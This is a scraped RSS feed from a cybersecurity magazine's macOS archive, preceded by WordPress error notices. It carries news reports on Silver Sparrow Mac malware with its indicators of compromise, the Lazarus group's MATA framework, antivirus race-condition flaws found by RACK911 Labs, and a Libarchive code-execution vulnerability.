Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the accelerated-mobile-pages domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Deprecated: Optional parameter $options declared before required parameter $ad is implicitly treated as a required parameter in /www/cisomagcom_810/public/wp-content/plugins/advanced-ads/classes/display-conditions.php on line 208

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the easy-digital-downloads domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the edd_cfm domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the edds domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the edd-recurring domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Deprecated: Optional parameter $params declared before required parameter $secretWord is implicitly treated as a required parameter in /www/cisomagcom_810/public/wp-content/plugins/edd-2checkout/sdk/lib/Twocheckout/TwocheckoutReturn.php on line 6

Deprecated: Optional parameter $insMessage declared before required parameter $secretWord is implicitly treated as a required parameter in /www/cisomagcom_810/public/wp-content/plugins/edd-2checkout/sdk/lib/Twocheckout/TwocheckoutNotification.php on line 6

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the edd-recurring domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the Newsmag domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /www/cisomagcom_810/public/wp-includes/functions.php on line 6121

Warning: Cannot modify header information - headers already sent by (output started at /www/cisomagcom_810/public/wp-includes/functions.php:6121) in /www/cisomagcom_810/public/wp-content/themes/Newsmag/functions.php on line 616

Warning: Cannot modify header information - headers already sent by (output started at /www/cisomagcom_810/public/wp-includes/functions.php:6121) in /www/cisomagcom_810/public/wp-includes/feed-rss2.php on line 8
MacOS Archives - CISO MAG | Cyber Security Magazine Beyond Cyber Security Mon, 22 Feb 2021 09:51:24 +0000 en-US hourly 1 https://wordpress.org/?v=6.8.1 30,000 Macs Affected by “Silver Sparrow” Mystery Malware https://staging-cisomagcom.kinsta.cloud/silver-sparrow-malware/ Mon, 22 Feb 2021 09:51:24 +0000 https://staging-cisomagcom.kinsta.cloud/?p=10111 Apple is known for its airtight security across its product line. However, a mystery malware dubbed “Silver Sparrow” has broken this myth by infecting nearly 30,000 Macs (29,139 to be precise) in over 153 countries worldwide. Researchers are scratching their heads trying to understand this malware because it is hiding on the infected machines still […]

The post 30,000 Macs Affected by “Silver Sparrow” Mystery Malware appeared first on CISO MAG | Cyber Security Magazine.

]]> Apple is known for its airtight security across its product line. However, a mystery malware dubbed “Silver Sparrow” has broken this myth by infecting nearly 30,000 Macs (29,139 to be precise) in over 153 countries worldwide. Researchers are scratching their heads trying to understand this malware because it is hiding on the infected machines still waiting for a payload to arrive. Usually, post-compromise, a payload is dropped that then carries out malicious activities, however, this is not the case here.

Analyzing the Silver Sparrow Malware

Red Canary’s blog post offers an in-depth analysis of how the malware was discovered, its targets, operations, and how it affects Apple’s latest M1 chip. For those who want facts and figures, the Silver Sparrow malware is currently the second known malware targeting the Apple M1 silicon chip. The first one was incidentally discovered a week ago by security researcher Patrick Wardle from Objective-See.

As per Red Canary, the Silver Sparrow malware has two versions:

  1. Version 1 IOCs

File name: updater.pkg (installer package for v1)

MD5: 30c9bc7d40454e501c358f77449071aa

  1. Version 2 IOCs

File name: update.pkg (installer package for v2)

MD5: fdd6fb2b1dfe07b0e57d4cbfef9c8149

silver sparrow malware
Image Credit: Red Canary

As shown in the above image, one version is a binary in mach-object format compiled for Intel x86_64 processors and the other version is a Mach-O binary for the M1 chip. The researchers believe that these are “bystander binaries” as they only display messages like “Hello World!” and “You did it!” when executed. As precautionary measures, Apple has revoked the licenses of both the binaries effective immediately.

Related News:

TeamTNT Spreads Malware with New Detection Evasion Tool “Libprocesshider”

Silver Sparrow uses Apple’s system.run command for execution and is thus difficult to detect. Researchers found that every hour the malware contacts the command-and-control center (C2) for further actions, however, none have been observed until now keeping the malware in stealth mode. Another interesting mechanism that the Silver Sparrow malware contains is its self-destruct mode. It has a file check that causes removal of all persistence mechanisms and scripts on execution leaving behind no trail of the attack vectors. Researchers say that the presence of such a sophisticated mechanism for this malware is also a “mystery,” because it means that the attackers were getting ready for a stealthy persistent attack rather than a simple intrude, spread, and exfiltrate kind of attack.

Thankfully, there is still no known indication of any damages through this malware, but the fact that Red Canary’s researchers found these strains of malware on Macs in the wild is worrisome. For the complete list of IOCs of the Silver Sparrow malware, click here.

Related News:

Researcher Finds New Android Malware Spreading Via WhatsApp Messages

The post 30,000 Macs Affected by “Silver Sparrow” Mystery Malware appeared first on CISO MAG | Cyber Security Magazine.

]]> Lazarus Hacking Group Strikes Again Using New Malware Variant “MATA” https://staging-cisomagcom.kinsta.cloud/mata-lazarus-hacking-group/ Thu, 23 Jul 2020 14:04:37 +0000 https://staging-cisomagcom.kinsta.cloud/?p=6462 Threat intelligence team at Kaspersky warned about a new malware campaign linked to the infamous North Korean Lazarus hacking group. Dubbed as “MATA,” the malware targeted e-commerce and IT firms in Poland, Germany, Turkey, Korea, Japan, and India to spread ransomware and steal sensitive information.  The MATA malware possesses several components like loader, orchestrator, and […]

The post Lazarus Hacking Group Strikes Again Using New Malware Variant “MATA” appeared first on CISO MAG | Cyber Security Magazine.

]]> Threat intelligence team at Kaspersky warned about a new malware campaign linked to the infamous North Korean Lazarus hacking group. Dubbed as “MATA,” the malware targeted e-commerce and IT firms in Poland, Germany, Turkey, Korea, Japan, and India to spread ransomware and steal sensitive information.  The MATA malware possesses several components like loader, orchestrator, and plugins to infect Windows, Linux, and macOS operating systems.

Researchers stated that the MATA malware campaign began as early as April 2018. “The actor behind this advanced malware framework used it aggressively to infiltrate corporate entities around the world. We identified several victims from our telemetry and figured out the purpose of this malware framework,” the researchers said.

Image Source: Kaspersky

How MATA Spreads

According to Kaspersky, MATA malware  is used to load plugins into the operating system’s running commands to infect and manipulate files and processes by injecting DLLs, creating HTTP proxies, and tunnels on targeted Windows devices. Once the malware successfully deployed, the attackers find databases with customers’ sensitive information and run database queries to acquire customer data.

“During our research, we also found a package containing different MATA files together with a set of hacking tools. In this case, the package was found on a legitimate distribution site, which might indicate that this is the way the malware was distributed. It included a Windows MATA orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server (CVE-2019-3396), a legitimate socat tool and a Linux version of the MATA orchestrator bundled together with a set of plugins,” the researchers added.

The Lazarus Timeline

The Lazarus hacking Group was involved in multiple cyberattacks earlier. In 2018, Kaspersky uncovered AppleJeus, a malicious operation by Lazarus Group to intrude on cryptocurrency exchanges and applications. In December 2019, the researchers discovered a malware dubbed as “Fileless” distributed by the Lazarus group.  According to the  security researchers, the hacking group was spreading malware targeting MacOS users, to create fake cryptocurrency trading applications.

 

The post Lazarus Hacking Group Strikes Again Using New Malware Variant “MATA” appeared first on CISO MAG | Cyber Security Magazine.

]]> Almost Every Antivirus Software Program Can Be Exploited, Researchers Say https://staging-cisomagcom.kinsta.cloud/almost-every-antivirus-software-program-can-be-exploited-researchers-say/ Thu, 30 Apr 2020 13:34:44 +0000 https://staging-cisomagcom.kinsta.cloud/?p=5628 A vulnerability in almost all antivirus software platforms could have been exploited to disable anti-malware protection and turned into destructive tools, security researchers from RACK911 Labs revealed. RACK911 Labs has found a unique method of using directory junctions (in Windows) and symlinks (in macOS and Linux) to turn antivirus software products into self-destructive tools. However, […]

The post Almost Every Antivirus Software Program Can Be Exploited, Researchers Say appeared first on CISO MAG | Cyber Security Magazine.

]]> A vulnerability in almost all antivirus software platforms could have been exploited to disable anti-malware protection and turned into destructive tools, security researchers from RACK911 Labs revealed. RACK911 Labs has found a unique method of using directory junctions (in Windows) and symlinks (in macOS and Linux) to turn antivirus software products into self-destructive tools. However, it was reported that most of the antivirus companies have now fixed the vulnerability in their products.

How the bugs are exploited

Researchers stated that an attacker must be highly time-sensitive and should know when to exploit the directory junction or symlink vulnerabilities. “What most antivirus software fail to take into consideration is the small window of time between the initial file scan that detects the malicious file and the cleanup operation that takes place immediately after. A malicious local user or malware author is often able to perform a race condition via a directory junction (Windows) or a symlink (Linux & macOS) that leverages the privileged file operations to disable the antivirus software or interfere with the operating system to render it useless,” the researchers explained.

Researchers used their proof-of-concept (PoC) to exploit Norton Internet Security for macOS and downloaded the EICAR test-string from Pastebin to evade protection that prevents the antivirus to download the test-string from the Norton official website. They also attempted the antivirus exploitation process against McAfee Endpoint Security for Windows using the same POC and were able to delete the EpSecApiLib.dll file.

Affected Antivirus Software

The researchers also listed all the vulnerable antivirus software products, which include:

Image Courtesy: rack911labs

RACK911 Labs stated that it notified all the antivirus vendors about the security vulnerabilities affecting their platform. It also clarified that most of the antivirus vendors have fixed the vulnerabilities in their antivirus products.

“Whether it’s Windows, macOS or Linux, it’s extremely important that file operations happen with the lowest level of authority to prevent attacks from taking place. One must always assume the user is malicious and by performing privileged file operations within reach of the user, it’s opening the door to a wide range of security vulnerabilities,” RACK911 Labs concluded.

The post Almost Every Antivirus Software Program Can Be Exploited, Researchers Say appeared first on CISO MAG | Cyber Security Magazine.

]]> Libarchive Vulnerability Allows Code Execution on Linux and BSD Distros https://staging-cisomagcom.kinsta.cloud/libarchive-vulnerability-allows-code-execution-on-linux-and-bsd-distros/ Wed, 06 Nov 2019 12:15:25 +0000 https://staging-cisomagcom.kinsta.cloud/?p=4234 Libarchive is a default compression library that is optimized for reading and writing compressed archive files in a single go. It means that Libarchive can process large archive files that cannot be stored on a disk and instead process them on-the-go as they read from or write to a network or a tape drive. Google […]

The post Libarchive Vulnerability Allows Code Execution on Linux and BSD Distros appeared first on CISO MAG | Cyber Security Magazine.

]]> Libarchive is a default compression library that is optimized for reading and writing compressed archive files in a single go. It means that Libarchive can process large archive files that cannot be stored on a disk and instead process them on-the-go as they read from or write to a network or a tape drive.

Google recently disclosed a Libarchive vulnerability which was discovered by its security researchers (having identifier CVE-2019-18408) using ClusterFuzz and OSSFuzz automated testing tools. It allowed hackers to execute arbitrary code if it received a specially crafted archive file. This library is included by default in Debian, Ubuntu, Gentoo, Arch Linux, FreeBSD (Berkeley Software Distribution), and NetBSD distros. The announcement of this vulnerability was made public as several Linux and FreeBSD distros released updated patches to fix the Libarchive vulnerability.

Debian Security Advisory authored by Moritz Muehlenhoff said, “A use-after-free was found in libarchive, a multi-format archive and compression library, which could result in denial of service (DDOS attack) and potentially, the execution of arbitrary code if a malformed archive is processed.” IBM in its security bulletin also mentioned that multiple Libarchive vulnerabilities have affected its Watson Explorer, a cognitive and content analysis platform.

Libarchive is also included as a default library in Microsoft Windows 10 (insider build 17063) since 2017.  Similarly, MacOS has integrated the usage of Libarchives since 2009, with bsdtar and bsdcpio being the default system tar and cpio command-line utilities. The bsdtar and bsdcpio command-line utilities are feature and performance enhanced as compared to other tar and cpio implementations and hence very popular across various operating environments. Its features include:

  • Reads a variety of formats, including tar, pax, cpio, zip, xar, lha, ar, cab, mtree, rar, and ISO images.
  • Writes tar, pax, cpio, zip, xar, ar, ISO, mtree, and shar archives.
  • Automatically handles archives compressed with gzip, bzip2, lzip, xz, lzma, or compress.
  • Unique format conversion feature.

Although this could have affected a wider audience, the Libarchive vulnerability being ineffective on Apple and Microsoft operating systems helped in its timely containment and rapid fix.

The post Libarchive Vulnerability Allows Code Execution on Linux and BSD Distros appeared first on CISO MAG | Cyber Security Magazine.

]]>